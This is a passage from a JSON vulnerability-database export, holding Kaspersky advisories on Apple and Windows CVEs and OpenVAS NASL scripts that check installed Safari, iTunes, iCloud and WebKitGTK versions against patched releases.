"privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "kaspersky", "title": "KLA11279 Multiple vulnerabilities in Apple iTunes", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-15422", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2020-06-03T00:00:00", "id": "KLA11279", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11279/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:02:28", "description": "### *Detect date*:\n10/16/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nA spoofing vulnerability was found in Microsoft Products (Extended Support Update). 
Malicious users can exploit this vulnerability to spoof user interface.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-13080](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-13080>) \n\n\n### *Impacts*:\nSUI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-13080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13080>)2.9Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB 
list*:\n[4041678](<http://support.microsoft.com/kb/4041678>) \n[4041681](<http://support.microsoft.com/kb/4041681>) \n[4042723](<http://support.microsoft.com/kb/4042723>)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-16T00:00:00", "type": "kaspersky", "title": "KLA11852 Security UI vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080"], "modified": "2020-07-21T00:00:00", "id": "KLA11852", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11852/", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-18T11:02:29", "description": "### *Detect date*:\n10/16/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nA spoofing vulnerability was found in Microsoft Windows. 
Malicious users can exploit this vulnerability to spoof user interface.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-13080](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-13080>) \n\n\n### *Impacts*:\nSUI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-13080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13080>)2.9Warning\n\n### *KB list*:\n[4041689](<http://support.microsoft.com/kb/4041689>) 
\n[4041693](<http://support.microsoft.com/kb/4041693>) \n[4041687](<http://support.microsoft.com/kb/4041687>) \n[4041676](<http://support.microsoft.com/kb/4041676>) \n[4041690](<http://support.microsoft.com/kb/4041690>) \n[4041691](<http://support.microsoft.com/kb/4041691>) \n[4042895](<http://support.microsoft.com/kb/4042895>) \n[4041679](<http://support.microsoft.com/kb/4041679>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-16T00:00:00", "type": "kaspersky", "title": "KLA11851 Security UI vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080"], "modified": "2020-07-21T00:00:00", "id": "KLA11851", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11851/", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-07-17T14:22:48", "description": "This host is installed with Apple Safari\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates( HT208324 
)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-5753", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-5715", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812284", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812284", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates( HT208324 )\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812284\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\", \"CVE-2017-13856\",\n \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-5753\", \"CVE-2017-5715\",\n \"CVE-2017-7161\", \"CVE-2017-13885\", \"CVE-2017-7165\", \"CVE-2017-13884\",\n \"CVE-2017-7153\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-28 14:26:04 +0530 (Thu, 28 Dec 2017)\");\n script_name(\"Apple Safari Security Updates( HT208324 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n memory corruption issues, command injection issue in Web Inspector, redirect\n responses to '401 Unauthorized' and other multiple errors leading to 'speculative\n execution side-channel attacks' that affect many modern processors and\n operating systems including Intel, AMD, and ARM.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code or\n cause a denial of service or gain access to potentially 
sensitive information\n or spoof user interface.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 11.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 11.0.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208324\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208403\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\npath = infos['location'];\n\n\nif(version_is_less(version:safVer, test_version:\"11.0.2\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"11.0.2\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:40", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates( HT208326 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-7157"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812285", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812285", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes 
Security Updates( HT208326 )\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812285\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2017-13864\", \"CVE-2017-13866\", \"CVE-2017-13856\", \"CVE-2017-13870\",\n \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-28 14:47:56 +0530 (Thu, 28 Dec 2017)\");\n script_name(\"Apple iTunes Security Updates( HT208326 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple memory corruption issues.\n\n - A privacy issue existed in 
the use of client certificates.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to track users by\n leveraging mishandling of client certificates and also execute arbitrary code\n or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208326\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nituneVer = infos['version'];\npath = infos['location'];\n\n##12.7.2 == 12.7.2.58\nif(version_is_less(version:ituneVer, test_version:\"12.7.2.58\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.2\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:39", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-14T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates( HT208328 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-7157"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812258", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310812258", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates HT208328)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812258\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2017-13864\", \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-13856\",\n \"CVE-2017-13870\", \"CVE-2017-13866\", \"CVE-2017-7160\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-14 16:00:28 +0530 (Thu, 14 Dec 2017)\");\n script_name(\"Apple iCloud Security Updates( HT208328 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks 
if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - A privacy issue existed in the use of client certificates.\n\n - Multiple memory corruption issues.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attacker to track a user and also\n arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208328\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"7.2\"))\n{\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.2\", install_path:path );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-05T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3514-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843406", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310843406", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3514_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3514-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843406\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-05 23:56:05 +0100 (Fri, 05 Jan 2018)\");\n script_cve_id(\"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3514-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.10,\n Ubuntu 17.04,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3514-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3514-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:48", "description": "The remote host is missing an update for the ", "cvss3": {}, 
"published": "2017-12-29T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-06b373d942", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873957", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873957", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_06b373d942_webkitgtk4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-06b373d942\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873957\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-29 08:05:22 +0100 (Fri, 29 Dec 2017)\");\n script_cve_id(\"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\", \"CVE-2017-13856\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for 